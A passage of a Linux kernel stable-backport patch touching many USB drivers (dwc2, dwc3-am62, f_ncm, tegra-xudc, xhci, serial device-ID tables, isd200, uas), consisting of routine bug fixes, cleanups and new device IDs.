+ 	dwc2_writel(hsotg, hr->haintmsk, HAINTMSK);
+ 
+-	for (i = 0; i < hsotg->params.host_channels; ++i)
++	for (i = 0; i < hsotg->params.host_channels; ++i) {
++		dwc2_writel(hsotg, hr->hcchar[i], HCCHAR(i));
++		dwc2_writel(hsotg, hr->hcsplt[i], HCSPLT(i));
+ 		dwc2_writel(hsotg, hr->hcintmsk[i], HCINTMSK(i));
++		dwc2_writel(hsotg, hr->hctsiz[i], HCTSIZ(i));
++		dwc2_writel(hsotg, hr->hcidma[i], HCDMA(i));
++		dwc2_writel(hsotg, hr->hcidmab[i], HCDMAB(i));
++	}
+ 
+ 	dwc2_writel(hsotg, hr->hprt0, HPRT0);
+ 	dwc2_writel(hsotg, hr->hfir, HFIR);
+@@ -5610,10 +5632,12 @@ int dwc2_host_exit_hibernation(struct dwc2_hsotg *hsotg, int rem_wakeup,
+ 	dwc2_writel(hsotg, hr->hcfg, HCFG);
+ 
+ 	/* De-assert Wakeup Logic */
+-	gpwrdn = dwc2_readl(hsotg, GPWRDN);
+-	gpwrdn &= ~GPWRDN_PMUACTV;
+-	dwc2_writel(hsotg, gpwrdn, GPWRDN);
+-	udelay(10);
++	if (!(rem_wakeup && hsotg->hw_params.snpsid >= DWC2_CORE_REV_4_30a)) {
++		gpwrdn = dwc2_readl(hsotg, GPWRDN);
++		gpwrdn &= ~GPWRDN_PMUACTV;
++		dwc2_writel(hsotg, gpwrdn, GPWRDN);
++		udelay(10);
++	}
+ 
+ 	hprt0 = hr->hprt0;
+ 	hprt0 |= HPRT0_PWR;
+@@ -5638,6 +5662,13 @@ int dwc2_host_exit_hibernation(struct dwc2_hsotg *hsotg, int rem_wakeup,
+ 		hprt0 |= HPRT0_RES;
+ 		dwc2_writel(hsotg, hprt0, HPRT0);
+ 
++		/* De-assert Wakeup Logic */
++		if ((rem_wakeup && hsotg->hw_params.snpsid >= DWC2_CORE_REV_4_30a)) {
++			gpwrdn = dwc2_readl(hsotg, GPWRDN);
++			gpwrdn &= ~GPWRDN_PMUACTV;
++			dwc2_writel(hsotg, gpwrdn, GPWRDN);
++			udelay(10);
++		}
+ 		/* Wait for Resume time and then program HPRT again */
+ 		mdelay(100);
+ 		hprt0 &= ~HPRT0_RES;
+diff --git a/drivers/usb/dwc2/hcd_ddma.c b/drivers/usb/dwc2/hcd_ddma.c
+index 6b4d825e97a2d..79582b102c7ed 100644
+--- a/drivers/usb/dwc2/hcd_ddma.c
++++ b/drivers/usb/dwc2/hcd_ddma.c
+@@ -559,7 +559,7 @@ static void dwc2_init_isoc_dma_desc(struct dwc2_hsotg *hsotg,
+ 	idx = qh->td_last;
+ 	inc = qh->host_interval;
+ 	hsotg->frame_number = dwc2_hcd_get_frame_number(hsotg);
+-	cur_idx = dwc2_frame_list_idx(hsotg->frame_number);
++	cur_idx = idx;
+ 	next_idx = dwc2_desclist_idx_inc(qh->td_last, inc, qh->dev_speed);
+ 
+ 	/*
+@@ -866,6 +866,8 @@ static int dwc2_cmpl_host_isoc_dma_desc(struct dwc2_hsotg *hsotg,
+ {
+ 	struct dwc2_dma_desc *dma_desc;
+ 	struct dwc2_hcd_iso_packet_desc *frame_desc;
++	u16 frame_desc_idx;
++	struct urb *usb_urb = qtd->urb->priv;
+ 	u16 remain = 0;
+ 	int rc = 0;
+ 
+@@ -878,8 +880,11 @@ static int dwc2_cmpl_host_isoc_dma_desc(struct dwc2_hsotg *hsotg,
+ 				DMA_FROM_DEVICE);
+ 
+ 	dma_desc = &qh->desc_list[idx];
++	frame_desc_idx = (idx - qtd->isoc_td_first) & (usb_urb->number_of_packets - 1);
+ 
+-	frame_desc = &qtd->urb->iso_descs[qtd->isoc_frame_index_last];
++	frame_desc = &qtd->urb->iso_descs[frame_desc_idx];
++	if (idx == qtd->isoc_td_first)
++		usb_urb->start_frame = dwc2_hcd_get_frame_number(hsotg);
+ 	dma_desc->buf = (u32)(qtd->urb->dma + frame_desc->offset);
+ 	if (chan->ep_is_in)
+ 		remain = (dma_desc->status & HOST_DMA_ISOC_NBYTES_MASK) >>
+@@ -900,7 +905,7 @@ static int dwc2_cmpl_host_isoc_dma_desc(struct dwc2_hsotg *hsotg,
+ 		frame_desc->status = 0;
+ 	}
+ 
+-	if (++qtd->isoc_frame_index == qtd->urb->packet_count) {
++	if (++qtd->isoc_frame_index == usb_urb->number_of_packets) {
+ 		/*
+ 		 * urb->status is not used for isoc transfers here. The
+ 		 * individual frame_desc status are used instead.
+@@ -1005,11 +1010,11 @@ static void dwc2_complete_isoc_xfer_ddma(struct dwc2_hsotg *hsotg,
+ 				return;
+ 			idx = dwc2_desclist_idx_inc(idx, qh->host_interval,
+ 						    chan->speed);
+-			if (!rc)
++			if (rc == 0)
+ 				continue;
+ 
+-			if (rc == DWC2_CMPL_DONE)
+-				break;
++			if (rc == DWC2_CMPL_DONE || rc == DWC2_CMPL_STOP)
++				goto stop_scan;
+ 
+ 			/* rc == DWC2_CMPL_STOP */
+ 
+diff --git a/drivers/usb/dwc2/hw.h b/drivers/usb/dwc2/hw.h
+index 13abdd5f67529..12f8c7f86dc98 100644
+--- a/drivers/usb/dwc2/hw.h
++++ b/drivers/usb/dwc2/hw.h
+@@ -698,7 +698,7 @@
+ #define TXSTS_QTOP_TOKEN_MASK		(0x3 << 25)
+ #define TXSTS_QTOP_TOKEN_SHIFT		25
+ #define TXSTS_QTOP_TERMINATE		BIT(24)
+-#define TXSTS_QSPCAVAIL_MASK		(0xff << 16)
++#define TXSTS_QSPCAVAIL_MASK		(0x7f << 16)
+ #define TXSTS_QSPCAVAIL_SHIFT		16
+ #define TXSTS_FSPCAVAIL_MASK		(0xffff << 0)
+ #define TXSTS_FSPCAVAIL_SHIFT		0
+diff --git a/drivers/usb/dwc2/platform.c b/drivers/usb/dwc2/platform.c
+index 58f53faab340f..2e4c6884f36a4 100644
+--- a/drivers/usb/dwc2/platform.c
++++ b/drivers/usb/dwc2/platform.c
+@@ -298,7 +298,7 @@ static int dwc2_driver_remove(struct platform_device *dev)
+ 
+ 	/* Exit clock gating when driver is removed. */
+ 	if (hsotg->params.power_down == DWC2_POWER_DOWN_PARAM_NONE &&
+-	    hsotg->bus_suspended) {
++	    hsotg->bus_suspended && !hsotg->params.no_clock_gating) {
+ 		if (dwc2_is_device_mode(hsotg))
+ 			dwc2_gadget_exit_clock_gating(hsotg, 0);
+ 		else
+diff --git a/drivers/usb/dwc3/dwc3-am62.c b/drivers/usb/dwc3/dwc3-am62.c
+index 173cf3579c55d..ad8a2eadb472b 100644
+--- a/drivers/usb/dwc3/dwc3-am62.c
++++ b/drivers/usb/dwc3/dwc3-am62.c
+@@ -89,7 +89,7 @@
+ 
+ #define DWC3_AM62_AUTOSUSPEND_DELAY	100
+ 
+-struct dwc3_data {
++struct dwc3_am62 {
+ 	struct device *dev;
+ 	void __iomem *usbss;
+ 	struct clk *usb2_refclk;
+@@ -115,19 +115,19 @@ static const int dwc3_ti_rate_table[] = {	/* in KHZ */
+ 	52000,
+ };
+ 
+-static inline u32 dwc3_ti_readl(struct dwc3_data *data, u32 offset)
++static inline u32 dwc3_ti_readl(struct dwc3_am62 *am62, u32 offset)
+ {
+-	return readl((data->usbss) + offset);
++	return readl((am62->usbss) + offset);
+ }
+ 
+-static inline void dwc3_ti_writel(struct dwc3_data *data, u32 offset, u32 value)
++static inline void dwc3_ti_writel(struct dwc3_am62 *am62, u32 offset, u32 value)
+ {
+-	writel(value, (data->usbss) + offset);
++	writel(value, (am62->usbss) + offset);
+ }
+ 
+-static int phy_syscon_pll_refclk(struct dwc3_data *data)
++static int phy_syscon_pll_refclk(struct dwc3_am62 *am62)
+ {
+-	struct device *dev = data->dev;
++	struct device *dev = am62->dev;
+ 	struct device_node *node = dev->of_node;
+ 	struct of_phandle_args args;
+ 	struct regmap *syscon;
+@@ -139,16 +139,16 @@ static int phy_syscon_pll_refclk(struct dwc3_data *data)
+ 		return PTR_ERR(syscon);
+ 	}
+ 
+-	data->syscon = syscon;
++	am62->syscon = syscon;
+ 
+ 	ret = of_parse_phandle_with_fixed_args(node, "ti,syscon-phy-pll-refclk", 1,
+ 					       0, &args);
+ 	if (ret)
+ 		return ret;
+ 
+-	data->offset = args.args[0];
++	am62->offset = args.args[0];
+ 
+-	ret = regmap_update_bits(data->syscon, data->offset, PHY_PLL_REFCLK_MASK, data->rate_code);
++	ret = regmap_update_bits(am62->syscon, am62->offset, PHY_PLL_REFCLK_MASK, am62->rate_code);
+ 	if (ret) {
+ 		dev_err(dev, "failed to set phy pll reference clock rate\n");
+ 		return ret;
+@@ -161,32 +161,32 @@ static int dwc3_ti_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+ 	struct device_node *node = pdev->dev.of_node;
+-	struct dwc3_data *data;
++	struct dwc3_am62 *am62;
+ 	int i, ret;
+ 	unsigned long rate;
+ 	u32 reg;
+ 
+-	data = devm_kzalloc(dev, sizeof(*data), GFP_KERNEL);
+-	if (!data)
++	am62 = devm_kzalloc(dev, sizeof(*am62), GFP_KERNEL);
++	if (!am62)
+ 		return -ENOMEM;
+ 
+-	data->dev = dev;
+-	platform_set_drvdata(pdev, data);
++	am62->dev = dev;
++	platform_set_drvdata(pdev, am62);
+ 
+-	data->usbss = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(data->usbss)) {
++	am62->usbss = devm_platform_ioremap_resource(pdev, 0);
++	if (IS_ERR(am62->usbss)) {
+ 		dev_err(dev, "can't map IOMEM resource\n");
+-		return PTR_ERR(data->usbss);
++		return PTR_ERR(am62->usbss);
+ 	}
+ 
+-	data->usb2_refclk = devm_clk_get(dev, "ref");
+-	if (IS_ERR(data->usb2_refclk)) {
++	am62->usb2_refclk = devm_clk_get(dev, "ref");
++	if (IS_ERR(am62->usb2_refclk)) {
+ 		dev_err(dev, "can't get usb2_refclk\n");
+-		return PTR_ERR(data->usb2_refclk);
++		return PTR_ERR(am62->usb2_refclk);
+ 	}
+ 
+ 	/* Calculate the rate code */
+-	rate = clk_get_rate(data->usb2_refclk);
++	rate = clk_get_rate(am62->usb2_refclk);
+ 	rate /= 1000;	// To KHz
+ 	for (i = 0; i < ARRAY_SIZE(dwc3_ti_rate_table); i++) {
+ 		if (dwc3_ti_rate_table[i] == rate)
+@@ -198,20 +198,20 @@ static int dwc3_ti_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	data->rate_code = i;
++	am62->rate_code = i;
+ 
+ 	/* Read the syscon property and set the rate code */
+-	ret = phy_syscon_pll_refclk(data);
++	ret = phy_syscon_pll_refclk(am62);
+ 	if (ret)
+ 		return ret;
+ 
+ 	/* VBUS divider select */
+-	data->vbus_divider = device_property_read_bool(dev, "ti,vbus-divider");
+-	reg = dwc3_ti_readl(data, USBSS_PHY_CONFIG);
+-	if (data->vbus_divider)
++	am62->vbus_divider = device_property_read_bool(dev, "ti,vbus-divider");
++	reg = dwc3_ti_readl(am62, USBSS_PHY_CONFIG);
++	if (am62->vbus_divider)
+ 		reg |= 1 << USBSS_PHY_VBUS_SEL_SHIFT;
+ 
+-	dwc3_ti_writel(data, USBSS_PHY_CONFIG, reg);
++	dwc3_ti_writel(am62, USBSS_PHY_CONFIG, reg);
+ 
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+@@ -219,7 +219,7 @@ static int dwc3_ti_probe(struct platform_device *pdev)
+ 	 * Don't ignore its dependencies with its children
+ 	 */
+ 	pm_suspend_ignore_children(dev, false);
+-	clk_prepare_enable(data->usb2_refclk);
++	clk_prepare_enable(am62->usb2_refclk);
+ 	pm_runtime_get_noresume(dev);
+ 
+ 	ret = of_platform_populate(node, NULL, NULL, dev);
+@@ -229,9 +229,9 @@ static int dwc3_ti_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	/* Set mode valid bit to indicate role is valid */
+-	reg = dwc3_ti_readl(data, USBSS_MODE_CONTROL);
++	reg = dwc3_ti_readl(am62, USBSS_MODE_CONTROL);
+ 	reg |= USBSS_MODE_VALID;
+-	dwc3_ti_writel(data, USBSS_MODE_CONTROL, reg);
++	dwc3_ti_writel(am62, USBSS_MODE_CONTROL, reg);
+ 
+ 	/* Setting up autosuspend */
+ 	pm_runtime_set_autosuspend_delay(dev, DWC3_AM62_AUTOSUSPEND_DELAY);
+@@ -241,35 +241,27 @@ static int dwc3_ti_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ err_pm_disable:
+-	clk_disable_unprepare(data->usb2_refclk);
++	clk_disable_unprepare(am62->usb2_refclk);
+ 	pm_runtime_disable(dev);
+ 	pm_runtime_set_suspended(dev);
+ 	return ret;
+ }
+ 
+-static int dwc3_ti_remove_core(struct device *dev, void *c)
+-{
+-	struct platform_device *pdev = to_platform_device(dev);
+-
+-	platform_device_unregister(pdev);
+-	return 0;
+-}
+-
+ static int dwc3_ti_remove(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+-	struct dwc3_data *data = platform_get_drvdata(pdev);
++	struct dwc3_am62 *am62 = platform_get_drvdata(pdev);
+ 	u32 reg;
+ 
+-	device_for_each_child(dev, NULL, dwc3_ti_remove_core);
++	pm_runtime_get_sync(dev);
++	of_platform_depopulate(dev);
+ 
+ 	/* Clear mode valid bit */
+-	reg = dwc3_ti_readl(data, USBSS_MODE_CONTROL);
++	reg = dwc3_ti_readl(am62, USBSS_MODE_CONTROL);
+ 	reg &= ~USBSS_MODE_VALID;
+-	dwc3_ti_writel(data, USBSS_MODE_CONTROL, reg);
++	dwc3_ti_writel(am62, USBSS_MODE_CONTROL, reg);
+ 
+ 	pm_runtime_put_sync(dev);
+-	clk_disable_unprepare(data->usb2_refclk);
+ 	pm_runtime_disable(dev);
+ 	pm_runtime_set_suspended(dev);
+ 
+@@ -280,18 +272,18 @@ static int dwc3_ti_remove(struct platform_device *pdev)
+ #ifdef CONFIG_PM
+ static int dwc3_ti_suspend_common(struct device *dev)
+ {
+-	struct dwc3_data *data = dev_get_drvdata(dev);
++	struct dwc3_am62 *am62 = dev_get_drvdata(dev);
+ 
+-	clk_disable_unprepare(data->usb2_refclk);
++	clk_disable_unprepare(am62->usb2_refclk);
+ 
+ 	return 0;
+ }
+ 
+ static int dwc3_ti_resume_common(struct device *dev)
+ {
+-	struct dwc3_data *data = dev_get_drvdata(dev);
++	struct dwc3_am62 *am62 = dev_get_drvdata(dev);
+ 
+-	clk_prepare_enable(data->usb2_refclk);
++	clk_prepare_enable(am62->usb2_refclk);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index 5e78fcc63e4d3..14601a2d25427 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -1348,7 +1348,7 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 	if (to_process == 1 &&
+ 	    (*(unsigned char *)(ntb_ptr + block_len) == 0x00)) {
+ 		to_process--;
+-	} else if (to_process > 0) {
++	} else if ((to_process > 0) && (block_len != 0)) {
+ 		ntb_ptr = (unsigned char *)(ntb_ptr + block_len);
+ 		goto parse_ntb;
+ 	}
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 0edd9e53fc5a1..82a10774a7ebc 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -292,7 +292,9 @@ int usb_ep_queue(struct usb_ep *ep,
+ {
+ 	int ret = 0;
+ 
+-	if (WARN_ON_ONCE(!ep->enabled && ep->address)) {
++	if (!ep->enabled && ep->address) {
++		pr_debug("USB gadget: queue request to disabled ep 0x%x (%s)\n",
++				 ep->address, ep->name);
+ 		ret = -ESHUTDOWN;
+ 		goto out;
+ 	}
+diff --git a/drivers/usb/gadget/udc/tegra-xudc.c b/drivers/usb/gadget/udc/tegra-xudc.c
+index a8cadc45c65aa..fd7a9535973ed 100644
+--- a/drivers/usb/gadget/udc/tegra-xudc.c
++++ b/drivers/usb/gadget/udc/tegra-xudc.c
+@@ -3486,8 +3486,8 @@ static void tegra_xudc_device_params_init(struct tegra_xudc *xudc)
+ 
+ static int tegra_xudc_phy_get(struct tegra_xudc *xudc)
+ {
+-	int err = 0, usb3;
+-	unsigned int i;
++	int err = 0, usb3_companion_port;
++	unsigned int i, j;
+ 
+ 	xudc->utmi_phy = devm_kcalloc(xudc->dev, xudc->soc->num_phys,
+ 					   sizeof(*xudc->utmi_phy), GFP_KERNEL);
+@@ -3515,7 +3515,7 @@ static int tegra_xudc_phy_get(struct tegra_xudc *xudc)
+ 		if (IS_ERR(xudc->utmi_phy[i])) {
+ 			err = PTR_ERR(xudc->utmi_phy[i]);
+ 			dev_err_probe(xudc->dev, err,
+-				      "failed to get usb2-%d PHY\n", i);
++				"failed to get PHY for phy-name usb2-%d\n", i);
+ 			goto clean_up;
+ 		} else if (xudc->utmi_phy[i]) {
+ 			/* Get usb-phy, if utmi phy is available */
+@@ -3534,19 +3534,30 @@ static int tegra_xudc_phy_get(struct tegra_xudc *xudc)
+ 		}
+ 
+ 		/* Get USB3 phy */
+-		usb3 = tegra_xusb_padctl_get_usb3_companion(xudc->padctl, i);
+-		if (usb3 < 0)
++		usb3_companion_port = tegra_xusb_padctl_get_usb3_companion(xudc->padctl, i);
++		if (usb3_companion_port < 0)
+ 			continue;
+ 
+-		snprintf(phy_name, sizeof(phy_name), "usb3-%d", usb3);
+-		xudc->usb3_phy[i] = devm_phy_optional_get(xudc->dev, phy_name);
+-		if (IS_ERR(xudc->usb3_phy[i])) {
+-			err = PTR_ERR(xudc->usb3_phy[i]);
+-			dev_err_probe(xudc->dev, err,
+-				      "failed to get usb3-%d PHY\n", usb3);
+-			goto clean_up;
+-		} else if (xudc->usb3_phy[i])
+-			dev_dbg(xudc->dev, "usb3-%d PHY registered", usb3);
++		for (j = 0; j < xudc->soc->num_phys; j++) {
++			snprintf(phy_name, sizeof(phy_name), "usb3-%d", j);
++			xudc->usb3_phy[i] = devm_phy_optional_get(xudc->dev, phy_name);
++			if (IS_ERR(xudc->usb3_phy[i])) {
++				err = PTR_ERR(xudc->usb3_phy[i]);
++				dev_err_probe(xudc->dev, err,
++					"failed to get PHY for phy-name usb3-%d\n", j);
++				goto clean_up;
++			} else if (xudc->usb3_phy[i]) {
++				int usb2_port =
++					tegra_xusb_padctl_get_port_number(xudc->utmi_phy[i]);
++				int usb3_port =
++					tegra_xusb_padctl_get_port_number(xudc->usb3_phy[i]);
++				if (usb3_port == usb3_companion_port) {
++					dev_dbg(xudc->dev, "USB2 port %d is paired with USB3 port %d for device mode port %d\n",
++					 usb2_port, usb3_port, i);
++					break;
++				}
++			}
++		}
+ 	}
+ 
+ 	return err;
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index c02ad4f76bb3c..565aba6b99860 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -1334,6 +1334,8 @@ static int xhci_map_temp_buffer(struct usb_hcd *hcd, struct urb *urb)
+ 
+ 	temp = kzalloc_node(buf_len, GFP_ATOMIC,
+ 			    dev_to_node(hcd->self.sysdev));
++	if (!temp)
++		return -ENOMEM;
+ 
+ 	if (usb_urb_dir_out(urb))
+ 		sg_pcopy_to_buffer(urb->sg, urb->num_sgs,
+diff --git a/drivers/usb/phy/phy-generic.c b/drivers/usb/phy/phy-generic.c
+index 953df04b40d40..3dc5c04e7cbf9 100644
+--- a/drivers/usb/phy/phy-generic.c
++++ b/drivers/usb/phy/phy-generic.c
+@@ -265,13 +265,6 @@ int usb_phy_gen_create_phy(struct device *dev, struct usb_phy_generic *nop)
+ 			return -EPROBE_DEFER;
+ 	}
+ 
+-	nop->vbus_draw = devm_regulator_get_exclusive(dev, "vbus");
+-	if (PTR_ERR(nop->vbus_draw) == -ENODEV)
+-		nop->vbus_draw = NULL;
+-	if (IS_ERR(nop->vbus_draw))
+-		return dev_err_probe(dev, PTR_ERR(nop->vbus_draw),
+-				     "could not get vbus regulator\n");
+-
+ 	nop->vbus_draw = devm_regulator_get_exclusive(dev, "vbus");
+ 	if (PTR_ERR(nop->vbus_draw) == -ENODEV)
+ 		nop->vbus_draw = NULL;
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index b3e60b3847941..aa30288c8a8e0 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -56,6 +56,8 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x0471, 0x066A) }, /* AKTAKOM ACE-1001 cable */
+ 	{ USB_DEVICE(0x0489, 0xE000) }, /* Pirelli Broadband S.p.A, DP-L10 SIP/GSM Mobile */
+ 	{ USB_DEVICE(0x0489, 0xE003) }, /* Pirelli Broadband S.p.A, DP-L10 SIP/GSM Mobile */
++	{ USB_DEVICE(0x04BF, 0x1301) }, /* TDK Corporation NC0110013M - Network Controller */
++	{ USB_DEVICE(0x04BF, 0x1303) }, /* TDK Corporation MM0110113M - i3 Micro Module */
+ 	{ USB_DEVICE(0x0745, 0x1000) }, /* CipherLab USB CCD Barcode Scanner 1000 */
+ 	{ USB_DEVICE(0x0846, 0x1100) }, /* NetGear Managed Switch M4100 series, M5300 series, M7100 series */
+ 	{ USB_DEVICE(0x08e6, 0x5501) }, /* Gemalto Prox-PU/CU contactless smartcard reader */
+@@ -144,6 +146,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x10C4, 0x85EA) }, /* AC-Services IBUS-IF */
+ 	{ USB_DEVICE(0x10C4, 0x85EB) }, /* AC-Services CIS-IBUS */
+ 	{ USB_DEVICE(0x10C4, 0x85F8) }, /* Virtenio Preon32 */
++	{ USB_DEVICE(0x10C4, 0x863C) }, /* MGP Instruments PDS100 */
+ 	{ USB_DEVICE(0x10C4, 0x8664) }, /* AC-Services CAN-IF */
+ 	{ USB_DEVICE(0x10C4, 0x8665) }, /* AC-Services OBD-IF */
+ 	{ USB_DEVICE(0x10C4, 0x87ED) }, /* IMST USB-Stick for Smart Meter */
+@@ -177,6 +180,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x10C4, 0xF004) }, /* Elan Digital Systems USBcount50 */
+ 	{ USB_DEVICE(0x10C5, 0xEA61) }, /* Silicon Labs MobiData GPRS USB Modem */
+ 	{ USB_DEVICE(0x10CE, 0xEA6A) }, /* Silicon Labs MobiData GPRS USB Modem 100EU */
++	{ USB_DEVICE(0x11CA, 0x0212) }, /* Verifone USB to Printer (UART, CP2102) */
+ 	{ USB_DEVICE(0x12B8, 0xEC60) }, /* Link G4 ECU */
+ 	{ USB_DEVICE(0x12B8, 0xEC62) }, /* Link G4+ ECU */
+ 	{ USB_DEVICE(0x13AD, 0x9999) }, /* Baltech card reader */
+diff --git a/drivers/usb/serial/ftdi_sio.c b/drivers/usb/serial/ftdi_sio.c
+index fe2173e37b061..248cbc9c48fd1 100644
+--- a/drivers/usb/serial/ftdi_sio.c
++++ b/drivers/usb/serial/ftdi_sio.c
+@@ -1077,6 +1077,8 @@ static const struct usb_device_id id_table_combined[] = {
+ 		.driver_info = (kernel_ulong_t)&ftdi_jtag_quirk },
+ 	{ USB_DEVICE(FTDI_VID, FTDI_FALCONIA_JTAG_UNBUF_PID),
+ 		.driver_info = (kernel_ulong_t)&ftdi_jtag_quirk },
++	/* GMC devices */
++	{ USB_DEVICE(GMC_VID, GMC_Z216C_PID) },
+ 	{ }					/* Terminating entry */
+ };
+ 
+diff --git a/drivers/usb/serial/ftdi_sio_ids.h b/drivers/usb/serial/ftdi_sio_ids.h
+index 21a2b5a25fc09..5ee60ba2a73cd 100644
+--- a/drivers/usb/serial/ftdi_sio_ids.h
++++ b/drivers/usb/serial/ftdi_sio_ids.h
+@@ -1606,3 +1606,9 @@
+ #define UBLOX_VID			0x1546
+ #define UBLOX_C099F9P_ZED_PID		0x0502
+ #define UBLOX_C099F9P_ODIN_PID		0x0503
++
++/*
++ * GMC devices
++ */
++#define GMC_VID				0x1cd7
++#define GMC_Z216C_PID			0x0217 /* GMC Z216C Adapter IR-USB */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index c0a0cca65437f..1a3e5a9414f07 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -613,6 +613,11 @@ static void option_instat_callback(struct urb *urb);
+ /* Luat Air72*U series based on UNISOC UIS8910 uses UNISOC's vendor ID */
+ #define LUAT_PRODUCT_AIR720U			0x4e00
+ 
++/* MeiG Smart Technology products */
++#define MEIGSMART_VENDOR_ID			0x2dee
++/* MeiG Smart SLM320 based on UNISOC UIS8910 */
++#define MEIGSMART_PRODUCT_SLM320		0x4d41
++
+ /* Device flags */
+ 
+ /* Highest interface number which can be used with NCTRL() and RSVD() */
+@@ -2282,6 +2287,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, LUAT_PRODUCT_AIR720U, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEIGSMART_VENDOR_ID, MEIGSMART_PRODUCT_SLM320, 0xff, 0, 0) },
+ 	{ } /* Terminating entry */
+ };
+ MODULE_DEVICE_TABLE(usb, option_ids);
+diff --git a/drivers/usb/storage/isd200.c b/drivers/usb/storage/isd200.c
+index 4e0eef1440b7f..300aeef160e75 100644
+--- a/drivers/usb/storage/isd200.c
++++ b/drivers/usb/storage/isd200.c
+@@ -1105,7 +1105,7 @@ static void isd200_dump_driveid(struct us_data *us, u16 *id)
+ static int isd200_get_inquiry_data( struct us_data *us )
+ {
+ 	struct isd200_info *info = (struct isd200_info *)us->extra;
+-	int retStatus = ISD200_GOOD;
++	int retStatus;
+ 	u16 *id = info->id;
+ 
+ 	usb_stor_dbg(us, "Entering isd200_get_inquiry_data\n");
+@@ -1137,6 +1137,13 @@ static int isd200_get_inquiry_data( struct us_data *us )
+ 				isd200_fix_driveid(id);
+ 				isd200_dump_driveid(us, id);
+ 
++				/* Prevent division by 0 in isd200_scsi_to_ata() */
++				if (id[ATA_ID_HEADS] == 0 || id[ATA_ID_SECTORS] == 0) {
++					usb_stor_dbg(us, "   Invalid ATA Identify data\n");
++					retStatus = ISD200_ERROR;
++					goto Done;
++				}
++
+ 				memset(&info->InquiryData, 0, sizeof(info->InquiryData));
+ 
+ 				/* Standard IDE interface only supports disks */
+@@ -1202,6 +1209,7 @@ static int isd200_get_inquiry_data( struct us_data *us )
+ 		}
+ 	}
+ 
++ Done:
+ 	usb_stor_dbg(us, "Leaving isd200_get_inquiry_data %08X\n", retStatus);
+ 
+ 	return(retStatus);
+@@ -1481,22 +1489,27 @@ static int isd200_init_info(struct us_data *us)
+ 
+ static int isd200_Initialization(struct us_data *us)
+ {
++	int rc = 0;
++
+ 	usb_stor_dbg(us, "ISD200 Initialization...\n");
+ 
+ 	/* Initialize ISD200 info struct */
+ 
+-	if (isd200_init_info(us) == ISD200_ERROR) {
++	if (isd200_init_info(us) < 0) {
+ 		usb_stor_dbg(us, "ERROR Initializing ISD200 Info struct\n");
++		rc = -ENOMEM;
+ 	} else {
+ 		/* Get device specific data */
+ 
+-		if (isd200_get_inquiry_data(us) != ISD200_GOOD)
++		if (isd200_get_inquiry_data(us) != ISD200_GOOD) {
+ 			usb_stor_dbg(us, "ISD200 Initialization Failure\n");
+-		else
++			rc = -EINVAL;
++		} else {
+ 			usb_stor_dbg(us, "ISD200 Initialization complete\n");
++		}
+ 	}
+ 
+-	return 0;
++	return rc;
+ }
+ 
+ 
+diff --git a/drivers/usb/storage/uas.c b/drivers/usb/storage/uas.c
+index ed22053b3252f..af619efe8eabf 100644
+--- a/drivers/usb/storage/uas.c
++++ b/drivers/usb/storage/uas.c
+@@ -533,7 +533,7 @@ static struct urb *uas_alloc_cmd_urb(struct uas_dev_info *devinfo, gfp_t gfp,
+  * daft to me.
+  */
+ 
+-static struct urb *uas_submit_sense_urb(struct scsi_cmnd *cmnd, gfp_t gfp)
++static int uas_submit_sense_urb(struct scsi_cmnd *cmnd, gfp_t gfp)
+ {
+ 	struct uas_dev_info *devinfo = cmnd->device->hostdata;
+ 	struct urb *urb;
+@@ -541,30 +541,28 @@ static struct urb *uas_submit_sense_urb(struct scsi_cmnd *cmnd, gfp_t gfp)
+ 
+ 	urb = uas_alloc_sense_urb(devinfo, gfp, cmnd);
+ 	if (!urb)
+-		return NULL;
++		return -ENOMEM;
+ 	usb_anchor_urb(urb, &devinfo->sense_urbs);
+ 	err = usb_submit_urb(urb, gfp);
+ 	if (err) {
+ 		usb_unanchor_urb(urb);
+ 		uas_log_cmd_state(cmnd, "sense submit err", err);
+ 		usb_free_urb(urb);
+-		return NULL;
+ 	}
+-	return urb;
++	return err;
+ }
+ 
+ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 			   struct uas_dev_info *devinfo)
+ {
+ 	struct uas_cmd_info *cmdinfo = scsi_cmd_priv(cmnd);
+-	struct urb *urb;
+ 	int err;
+ 
+ 	lockdep_assert_held(&devinfo->lock);
+ 	if (cmdinfo->state & SUBMIT_STATUS_URB) {
+-		urb = uas_submit_sense_urb(cmnd, GFP_ATOMIC);
+-		if (!urb)
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
